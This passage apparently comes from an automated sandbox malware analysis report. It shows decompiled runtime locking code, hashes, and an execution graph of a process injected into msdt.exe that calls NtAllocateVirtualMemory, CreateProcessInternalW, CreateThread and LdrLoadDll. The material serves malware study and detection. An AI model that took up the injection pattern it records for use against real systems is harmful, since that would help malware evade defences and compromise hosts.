					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00c901c0;
									_push(_t92);
									_push(0);
									_t37 = L00BAF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = L00BF4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									L00C03F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									L00C03F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00C3217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00C03F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									L00BF3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00BD5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = L00BAF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											L00BF3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = L00BAF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												L00BF3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = L00BAF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = L00BF3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00BD5329(_t74, _t92);
													_push(1);
													_t48 = E00BD53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                                            0x00bd53ab
                                                                            0x00bd53ae
                                                                            0x00bd53b1
                                                                            0x00bd53b4
                                                                            0x00bd53b7
                                                                            0x00bf05b6
                                                                            0x00bf05c0
                                                                            0x00bf05c3
                                                                            0x00000000
                                                                            0x00bf05c9
                                                                            0x00bf05c9
                                                                            0x00bf05cc
                                                                            0x00bf05d5
                                                                            0x00bf05d5
                                                                            0x00bd53bd
                                                                            0x00bd53bd
                                                                            0x00bd53bd
                                                                            0x00bd53be
                                                                            0x00bd53be
                                                                            0x00bd53be
                                                                            0x00bd53c0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c12269
                                                                            0x00c1226d
                                                                            0x00c12349
                                                                            0x00c1234d
                                                                            0x00c12273
                                                                            0x00c12276
                                                                            0x00c12279
                                                                            0x00c1227e
                                                                            0x00c12283
                                                                            0x00c12287
                                                                            0x00c1228a
                                                                            0x00c1228d
                                                                            0x00c1228f
                                                                            0x00c122bc
                                                                            0x00c122bc
                                                                            0x00c122bc
                                                                            0x00c122be
                                                                            0x00c122c4
                                                                            0x00c122cc
                                                                            0x00c122d0
                                                                            0x00c122d6
                                                                            0x00c122d7
                                                                            0x00c122da
                                                                            0x00c122df
                                                                            0x00c122e4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122e6
                                                                            0x00c122e9
                                                                            0x00c122f4
                                                                            0x00c122f9
                                                                            0x00c122fa
                                                                            0x00c12305
                                                                            0x00c12314
                                                                            0x00c12319
                                                                            0x00c1231a
                                                                            0x00c1231d
                                                                            0x00c12320
                                                                            0x00c12323
                                                                            0x00c12323
                                                                            0x00c12328
                                                                            0x00c1232d
                                                                            0x00c1232f
                                                                            0x00c12331
                                                                            0x00c12336
                                                                            0x00c12336
                                                                            0x00c1233b
                                                                            0x00c1233d
                                                                            0x00c12350
                                                                            0x00c12351
                                                                            0x00c12356
                                                                            0x00c12359
                                                                            0x00c12359
                                                                            0x00c1235b
                                                                            0x00c1235d
                                                                            0x00bd5367
                                                                            0x00bd536b
                                                                            0x00bd5372
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c12363
                                                                            0x00c12363
                                                                            0x00c12369
                                                                            0x00c1236a
                                                                            0x00c1236c
                                                                            0x00c12371
                                                                            0x00c12373
                                                                            0x00000000
                                                                            0x00c12379
                                                                            0x00c12379
                                                                            0x00c1237a
                                                                            0x00c1237f
                                                                            0x00c1237f
                                                                            0x00c12385
                                                                            0x00c12386
                                                                            0x00c12389
                                                                            0x00c1238e
                                                                            0x00c12390
                                                                            0x00bd5378
                                                                            0x00bd537c
                                                                            0x00c12396
                                                                            0x00c12396
                                                                            0x00c12397
                                                                            0x00c1239c
                                                                            0x00c123a2
                                                                            0x00c123a3
                                                                            0x00c123a6
                                                                            0x00c123ab
                                                                            0x00c123ad
                                                                            0x00000000
                                                                            0x00c123b3
                                                                            0x00c123b3
                                                                            0x00c123b4
                                                                            0x00c123b9
                                                                            0x00c123ba
                                                                            0x00c123ba
                                                                            0x00c123bc
                                                                            0x00c123bf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c09153
                                                                            0x00c09158
                                                                            0x00c0915a
                                                                            0x00c0915e
                                                                            0x00c09160
                                                                            0x00000000
                                                                            0x00c09166
                                                                            0x00c09166
                                                                            0x00c09171
                                                                            0x00c09176
                                                                            0x00c09176
                                                                            0x00000000
                                                                            0x00c09160
                                                                            0x00c123c6
                                                                            0x00c123cb
                                                                            0x00c123ce
                                                                            0x00c123d7
                                                                            0x00c123d7
                                                                            0x00c123ad
                                                                            0x00c12390
                                                                            0x00c12373
                                                                            0x00c1233f
                                                                            0x00c1233f
                                                                            0x00000000
                                                                            0x00c1233f
                                                                            0x00c12291
                                                                            0x00c12291
                                                                            0x00c12293
                                                                            0x00c12295
                                                                            0x00c1229a
                                                                            0x00c122a1
                                                                            0x00c122a3
                                                                            0x00c122a7
                                                                            0x00c122a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122ab
                                                                            0x00c122ad
                                                                            0x00c122af
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122af
                                                                            0x00c122b1
                                                                            0x00c122b4
                                                                            0x00c122b4
                                                                            0x00c122b6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122b6
                                                                            0x00c1228f
                                                                            0x00000000
                                                                            0x00c1226d
                                                                            0x00bd53cb
                                                                            0x00bd53ce
                                                                            0x00bd53d0
                                                                            0x00bd53d4
                                                                            0x00bd53d6
                                                                            0x00000000
                                                                            0x00bd53d8
                                                                            0x00bd53e3
                                                                            0x00bd53ea
                                                                            0x00bd53ea
                                                                            0x00bd53d6
                                                                            0x00000000

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C122F4
                                                                            Strings
                                                                            • RTL: Re-Waiting, xrefs: 00C12328
                                                                            • RTL: Resource at %p, xrefs: 00C1230B
                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00C122FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-871070163
                                                                            • Opcode ID: 8638ad7559a7488d021d60da932273bc75797f1ba60b217f3c9b6cf4fbdb8592
                                                                            • Instruction ID: 53d8ef4351362bdff22782789f9d1272b8957a073fbba59df232053dc404d8f7
                                                                            • Opcode Fuzzy Hash: 8638ad7559a7488d021d60da932273bc75797f1ba60b217f3c9b6cf4fbdb8592
                                                                            • Instruction Fuzzy Hash: 7D5126716006066BDB20DA68CC81FEB73DCEF55360F1042AAFD59DB281EAB1ED418794
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Analysis Process: msdt.exe PID: 2848 Parent PID: 1764 msdt.exeCOMMON

                                                                            Execution Graph

                                                                            Execution Coverage:2.3%
                                                                            Dynamic/Decrypted Code Coverage:2.7%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:438
                                                                            Total number of Limit Nodes:64

                                                                            Graph

                                                                            execution_graph 54581 9d46d 54584 99c90 54581->54584 54583 9d472 54585 99cb6 54584->54585 54590 88b70 54585->54590 54587 99cc2 54588 99ce6 54587->54588 54596 87e50 54587->54596 54588->54583 54618 88ac0 54590->54618 54592 88b84 54592->54587 54593 88b7d 54593->54592 54625 8cf80 54593->54625 54600 87e77 54596->54600 54598 87f16 54599 9a280 RtlAllocateHeap 54598->54599 54616 87ff4 54598->54616 54601 87f2c 54599->54601 54600->54616 54867 8d180 54600->54867 54602 9a280 RtlAllocateHeap 54601->54602 54603 87f3d 54602->54603 54604 9a280 RtlAllocateHeap 54603->54604 54605 87f4e 54604->54605 54877 8aee0 54605->54877 54607 87f61 54608 93a60 6 API calls 54607->54608 54609 87f72 54608->54609 54610 93a60 6 API calls 54609->54610 54611 87f83 54610->54611 54615 87f9c 54611->54615 54883 8ba50 54611->54883 54613 93a60 6 API calls 54617 87fba 54613->54617 54615->54613 54615->54617 54616->54588 54887 87c80 54617->54887 54620 88ad3 54618->54620 54619 88ae6 54619->54593 54620->54619 54633 99540 54620->54633 54622 88b23 54622->54619 54644 888e0 54622->54644 54624 88b43 54624->54593 54627 8cf99 54625->54627 54626 88b95 54626->54587 54627->54626 54859 98a60 54627->54859 54629 8cfd2 54630 8cffd 54629->54630 54862 984f0 54629->54862 54632 98720 NtClose 54630->54632 54632->54626 54634 99559 54633->54634 54650 93a60 54634->54650 54636 99571 54637 9957a 54636->54637 54675 99380 54636->54675 54637->54622 54639 9958e 54639->54637 54689 98190 54639->54689 54838 86e30 54644->54838 54646 88901 54646->54624 54647 888fa 54647->54646 54851 870f0 54647->54851 54651 93d95 54650->54651 54652 93a74 54650->54652 54651->54636 54652->54651 54696 97ee0 54652->54696 54654 93b54 54659 93b83 54654->54659 54699 985f0 54654->54699 54656 93bc7 54657 9a0b0 RtlFreeHeap 54656->54657 54662 93bd3 54657->54662 54658 93d59 54660 98720 NtClose 54658->54660 54659->54636 54661 93d60 54660->54661 54661->54636 54662->54658 54662->54659 54663 93cc9 54662->54663 54664 93c71 54662->54664 54663->54658 54668 93cdc 54663->54668 54665 93c76 54664->54665 54666 93c8f 54664->54666 54667 93ca7 54664->54667 54665->54636 54702 93700 54666->54702 54667->54661 54712 93420 54667->54712 54744 98720 54668->54744 54670 93c9d 54670->54636 54672 93cbf 54672->54636 54674 93d48 54674->54636 54676 99391 54675->54676 54677 993a3 54676->54677 54764 9a030 54676->54764 54677->54639 54679 993c4 54767 93070 54679->54767 54681 99410 54681->54639 54682 993e7 54682->54681 54683 93070 2 API calls 54682->54683 54685 99409 54683->54685 54685->54681 54799 943a0 54685->54799 54686 9949a 54809 98150 54686->54809 54690 981ac 54689->54690 54834 25efae8 LdrInitializeThunk 54690->54834 54691 981c7 54693 9a0b0 54691->54693 54694 995e9 54693->54694 54835 98900 54693->54835 54694->54622 54747 991f0 54696->54747 54698 97efc RtlDosPathNameToNtPathName_U 54698->54654 54700 991f0 54699->54700 54701 9860c NtCreateFile 54700->54701 54701->54656 54703 9371c 54702->54703 54704 93758 54703->54704 54705 93744 54703->54705 54707 98720 NtClose 54704->54707 54706 98720 NtClose 54705->54706 54708 9374d 54706->54708 54709 93761 54707->54709 54708->54670 54749 9a2c0 RtlAllocateHeap 54709->54749 54711 9376c 54711->54670 54713 9346b 54712->54713 54714 9349e 54712->54714 54715 98720 NtClose 54713->54715 54716 934ba 54714->54716 54722 935e9 54714->54722 54717 9348f 54715->54717 54718 934dc 54716->54718 54719 934f1 54716->54719 54717->54672 54723 98720 NtClose 54718->54723 54720 9350c 54719->54720 54721 934f6 54719->54721 54732 93511 54720->54732 54750 9a280 54720->54750 54724 98720 NtClose 54721->54724 54725 98720 NtClose 54722->54725 54726 934e5 54723->54726 54727 934ff 54724->54727 54728 93649 54725->54728 54726->54672 54727->54672 54728->54672 54731 93577 54733 935aa 54731->54733 54734 93595 54731->54734 54737 93523 54732->54737 54753 986a0 54732->54753 54736 98720 NtClose 54733->54736 54735 98720 NtClose 54734->54735 54735->54737 54738 935b3 54736->54738 54737->54672 54739 935df 54738->54739 54756 99e80 54738->54756 54739->54672 54741 935ca 54742 9a0b0 RtlFreeHeap 54741->54742 54743 935d3 54742->54743 54743->54672 54745 991f0 54744->54745 54746 9873c NtClose 54745->54746 54746->54674 54748 99200 54747->54748 54748->54698 54749->54711 54761 988c0 54750->54761 54752 9a298 54752->54732 54754 991f0 54753->54754 54755 986bc NtReadFile 54754->54755 54755->54731 54757 99e8d 54756->54757 54758 99ea4 54756->54758 54757->54758 54759 9a280 RtlAllocateHeap 54757->54759 54758->54741 54760 99ebb 54759->54760 54760->54741 54762 991f0 54761->54762 54763 988dc RtlAllocateHeap 54762->54763 54763->54752 54765 9a05d 54764->54765 54813 987d0 54764->54813 54765->54679 54768 93081 54767->54768 54769 93089 54767->54769 54768->54682 54770 9335c 54769->54770 54816 9b260 54769->54816 54770->54682 54772 930dd 54773 9b260 RtlAllocateHeap 54772->54773 54776 930e8 54773->54776 54774 93136 54777 9b260 RtlAllocateHeap 54774->54777 54776->54774 54778 9b390 2 API calls 54776->54778 54827 9b300 RtlAllocateHeap RtlFreeHeap 54776->54827 54780 9314a 54777->54780 54778->54776 54779 931a7 54781 9b260 RtlAllocateHeap 54779->54781 54780->54779 54821 9b390 54780->54821 54782 931bd 54781->54782 54784 931fa 54782->54784 54786 9b390 2 API calls 54782->54786 54785 9b260 RtlAllocateHeap 54784->54785 54787 93205 54785->54787 54786->54782 54788 9b390 2 API calls 54787->54788 54794 9323f 54787->54794 54788->54787 54790 93334 54829 9b2c0 RtlFreeHeap 54790->54829 54792 9333e 54830 9b2c0 RtlFreeHeap 54792->54830 54828 9b2c0 RtlFreeHeap 54794->54828 54795 93348 54831 9b2c0 RtlFreeHeap 54795->54831 54797 93352 54832 9b2c0 RtlFreeHeap 54797->54832 54800 943b1 54799->54800 54801 93a60 6 API calls 54800->54801 54803 943c7 54801->54803 54802 9441a 54802->54686 54803->54802 54804 94402 54803->54804 54805 94415 54803->54805 54806 9a0b0 RtlFreeHeap 54804->54806 54807 9a0b0 RtlFreeHeap 54805->54807 54808 94407 54806->54808 54807->54802 54808->54686 54810 9816c 54809->54810 54833 25efdc0 LdrInitializeThunk 54810->54833 54811 98183 54811->54639 54814 991f0 54813->54814 54815 987ec NtAllocateVirtualMemory 54814->54815 54815->54765 54817 9b270 54816->54817 54818 9b276 54816->54818 54817->54772 54819 9a280 RtlAllocateHeap 54818->54819 54820 9b29c 54819->54820 54820->54772 54822 9b300 54821->54822 54823 9a280 RtlAllocateHeap 54822->54823 54826 9b35d 54822->54826 54824 9b33a 54823->54824 54825 9a0b0 RtlFreeHeap 54824->54825 54825->54826 54826->54780 54827->54776 54828->54790 54829->54792 54830->54795 54831->54797 54832->54770 54833->54811 54834->54691 54836 991f0 54835->54836 54837 9891c RtlFreeHeap 54836->54837 54837->54694 54839 86e3b 54838->54839 54840 86e40 54838->54840 54839->54647 54841 9a030 NtAllocateVirtualMemory 54840->54841 54842 86e65 54841->54842 54843 86ec8 54842->54843 54844 98150 LdrInitializeThunk 54842->54844 54845 86ece 54842->54845 54850 9a030 NtAllocateVirtualMemory 54842->54850 54854 98850 54842->54854 54843->54647 54844->54842 54846 86ef4 54845->54846 54848 98850 LdrInitializeThunk 54845->54848 54846->54647 54849 86ee5 54848->54849 54849->54647 54850->54842 54852 8710e 54851->54852 54853 98850 LdrInitializeThunk 54851->54853 54852->54624 54853->54852 54855 9886c 54854->54855 54858 25efb68 LdrInitializeThunk 54855->54858 54856 98883 54856->54842 54858->54856 54860 991f0 54859->54860 54861 98a7f LookupPrivilegeValueW 54860->54861 54861->54629 54863 9850c 54862->54863 54866 25efed0 LdrInitializeThunk 54863->54866 54864 9852b 54864->54630 54866->54864 54868 8d1ac 54867->54868 54903 8d090 54868->54903 54871 8d1d9 54872 8d1e4 54871->54872 54875 98720 NtClose 54871->54875 54872->54598 54873 8d202 54873->54598 54874 8d1f1 54874->54873 54876 98720 NtClose 54874->54876 54875->54872 54876->54873 54878 8aef6 54877->54878 54880 8af00 54877->54880 54878->54607 54879 8afa8 54879->54607 54880->54879 54881 93a60 6 API calls 54880->54881 54882 8b019 54881->54882 54882->54607 54884 8ba76 54883->54884 54914 8b740 54884->54914 54886 8badc 54886->54615 54939 8d440 54887->54939 54889 87e41 54889->54616 54890 87c93 54890->54889 54943 933b0 54890->54943 54892 87cf2 54892->54889 54946 87a30 54892->54946 54895 9b260 RtlAllocateHeap 54896 87d39 54895->54896 54897 9b390 2 API calls 54896->54897 54900 87d4e 54897->54900 54898 86e30 3 API calls 54898->54900 54900->54889 54900->54898 54902 870f0 LdrInitializeThunk 54900->54902 54951 8ac10 54900->54951 54983 8d3e0 54900->54983 54902->54900 54904 8d160 54903->54904 54905 8d0aa 54903->54905 54904->54871 54904->54874 54909 98210 54905->54909 54908 98720 NtClose 54908->54904 54910 9822c 54909->54910 54913 25f07ac LdrInitializeThunk 54910->54913 54911 8d154 54911->54908 54913->54911 54915 8b757 54914->54915 54920 8d480 54915->54920 54919 8b7cb 54919->54886 54921 8d4a5 54920->54921 54931 87130 54921->54931 54923 8b79f 54928 98970 54923->54928 54924 93a60 6 API calls 54926 8d4c9 54924->54926 54926->54923 54926->54924 54927 9a0b0 RtlFreeHeap 54926->54927 54938 8d2c0 CreateProcessInternalW LdrInitializeThunk 54926->54938 54927->54926 54929 991f0 54928->54929 54930 9898f CreateProcessInternalW 54929->54930 54930->54919 54932 8722f 54931->54932 54933 87145 54931->54933 54932->54926 54933->54932 54934 93a60 6 API calls 54933->54934 54935 871b2 54934->54935 54936 9a0b0 RtlFreeHeap 54935->54936 54937 871d9 54935->54937 54936->54937 54937->54926 54938->54926 54940 8d45f 54939->54940 54941 8d46d 54940->54941 54942 8d466 SetErrorMode 54940->54942 54941->54890 54942->54941 54987 8d210 54943->54987 54945 933d6 54945->54892 54947 9a030 NtAllocateVirtualMemory 54946->54947 54950 87a55 54947->54950 54948 87c6a 54948->54895 54950->54948 55004 97b10 54950->55004 54952 8ac29 54951->54952 54953 8ac2f 54951->54953 55045 8ccd0 54952->55045 55054 88630 54953->55054 54956 8ac3c 54957 8aec8 54956->54957 54958 9b390 2 API calls 54956->54958 54957->54900 54959 8ac58 54958->54959 54960 8d3e0 LdrInitializeThunk 54959->54960 54961 8ac6c 54959->54961 54960->54961 54961->54957 54962 98190 LdrInitializeThunk 54961->54962 54968 8ad96 54961->54968 54963 8acea 54962->54963 54966 8acf6 54963->54966 54963->54968 54964 8adbd 54967 98720 NtClose 54964->54967 54965 8ad3f 54971 98720 NtClose 54965->54971 54966->54957 54966->54965 54969 982a0 LdrInitializeThunk 54966->54969 54970 8adc7 54967->54970 54968->54964 54979 8ade6 54968->54979 54969->54965 54970->54900 54972 8ad5c 54971->54972 55060 975c0 54972->55060 54974 8ad73 54974->54957 55063 87290 54974->55063 54977 98720 NtClose 54978 8ae9b 54977->54978 54980 98720 NtClose 54978->54980 54979->54977 54981 8aea5 54980->54981 54981->54957 54982 87290 3 API calls 54981->54982 54982->54957 54984 8d3f3 54983->54984 55110 98120 54984->55110 54988 8d22d 54987->54988 54994 98250 54988->54994 54991 8d275 54991->54945 54995 9826c 54994->54995 55002 25effb4 LdrInitializeThunk 54995->55002 54996 8d26e 54996->54991 54998 982a0 54996->54998 54999 982bc 54998->54999 55003 25efc60 LdrInitializeThunk 54999->55003 55000 8d29e 55000->54945 55002->54996 55003->55000 55005 9a280 RtlAllocateHeap 55004->55005 55006 97b27 55005->55006 55023 88170 55006->55023 55008 97b42 55009 97b69 55008->55009 55010 97b80 55008->55010 55011 9a0b0 RtlFreeHeap 55009->55011 55013 9a030 NtAllocateVirtualMemory 55010->55013 55012 97b76 55011->55012 55012->54948 55014 97bba 55013->55014 55015 9a030 NtAllocateVirtualMemory 55014->55015 55016 97bd3 55015->55016 55017 97e60 55016->55017 55020 97e74 55016->55020 55018 9a0b0 RtlFreeHeap 55017->55018 55019 97e6a 55018->55019 55019->54948 55021 9a0b0 RtlFreeHeap 55020->55021 55022 97ec9 55021->55022 55022->54948 55024 88195 55023->55024 55029 89b50 55024->55029 55028 881ed 55028->55008 55030 89b74 55029->55030 55031 89bb0 LdrLoadDll 55030->55031 55032 881c8 55030->55032 55031->55032 55032->55028 55033 8b350 55032->55033 55035 8b37c 55033->55035 55034 8b39c 55034->55028 55035->55034 55040 984b0 55035->55040 55037 8b3bf 55037->55034 55038 98720 NtClose 55037->55038 55039 8b3fa 55038->55039 55039->55028 55041 984cc 55040->55041 55044 25efbb8 LdrInitializeThunk 55041->55044 55042 984e7 55042->55037 55044->55042 55071 8bdc0 55045->55071 55047 8cce7 55048 8cd00 55047->55048 55078 83d70 55047->55078 55050 9a280 RtlAllocateHeap 55048->55050 55052 8cd0e 55050->55052 55051 8ccfa 55091 97440 55051->55091 55052->54953 55055 8864b 55054->55055 55056 8d090 2 API calls 55055->55056 55058 88761 55055->55058 55057 8874c 55056->55057 55057->55058 55059 98720 NtClose 55057->55059 55058->54956 55059->55058 55061 8d3e0 LdrInitializeThunk 55060->55061 55062 975f2 55061->55062 55062->54974 55064 872a8 55063->55064 55065 89b50 LdrLoadDll 55064->55065 55066 872c3 55065->55066 55067 872dc PostThreadMessageW 55066->55067 55068 8730d 55066->55068 55067->55068 55069 872f0 55067->55069 55068->54900 55070 872fa PostThreadMessageW 55069->55070 55070->55068 55072 8bdf3 55071->55072 55073 8d210 2 API calls 55072->55073 55074 8be5d 55073->55074 55075 8be64 55074->55075 55095 9a2c0 RtlAllocateHeap 55074->55095 55075->55047 55077 8be74 55077->55047 55079 83d96 55078->55079 55080 8b350 2 API calls 55079->55080 55082 83e61 55080->55082 55081 83e68 55081->55051 55082->55081 55096 8b410 55082->55096 55086 84083 55087 9a030 NtAllocateVirtualMemory 55086->55087 55088 84110 55087->55088 55089 9a030 NtAllocateVirtualMemory 55088->55089 55090 8412a 55089->55090 55090->55051 55093 97461 55091->55093 55092 97487 55092->55048 55093->55092 55094 97474 CreateThread 55093->55094 55094->55048 55095->55077 55097 8b435 55096->55097 55104 98320 55097->55104 55100 983b0 55101 983cc 55100->55101 55109 25efab8 LdrInitializeThunk 55101->55109 55102 983eb 55102->55086 55105 9833c 55104->55105 55108 25efb50 LdrInitializeThunk 55105->55108 55106 8405c 55106->55086 55106->55100 55108->55106 55109->55102 55111 9813c 55110->55111 55114 25efd8c LdrInitializeThunk 55111->55114 55112 8d41e 55112->54900 55114->55112 55115 97310 55116 9a030 NtAllocateVirtualMemory 55115->55116 55118 9734b 55115->55118 55116->55118 55117 9742c 55118->55117 55119 89b50 LdrLoadDll 55118->55119 55121 97381 55119->55121 55120 973b0 Sleep 55120->55121 55121->55117 55121->55120 55123 25ef900 LdrInitializeThunk

                                                                            Executed Functions

                                                                            Function 000985F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 149 985f0-98641 call 991f0 NtCreateFile
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00093BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0009863D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: .z`
                                                                            • API String ID: 823142352-1441809116
                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction ID: 01ba565484d457222384f1439decfd61839a5cd3e5c1bdd99fabe67913782f9a
                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction Fuzzy Hash: 64F0BDB2200208ABCB08CF88DC85EEB77ADBF8C754F158248BA0D97241C630E811CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 000986A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 152 986a0-986e9 call 991f0 NtReadFile
                                                                            APIs
                                                                            • NtReadFile.NTDLL(00093D82,5E972F65,FFFFFFFF,?,?,?,00093D82,?,A:,FFFFFFFF,5E972F65,00093D82,?,00000000), ref: 000986E5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_7_2_80000_msdt.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID: A:
                                                                            • API String ID: 2738559852-3530315832
                                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction ID: 1a58f9cca17ac6bddfd2719e1cd4b851a781f0d66f6a61bca9ddf50481e07014
                                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction Fuzzy Hash: 27F092B2200208ABCB14DF89DC85EEB77ADAF8C754F158248BA1D97251D630E8118BA0
                                                                            Uniqueness

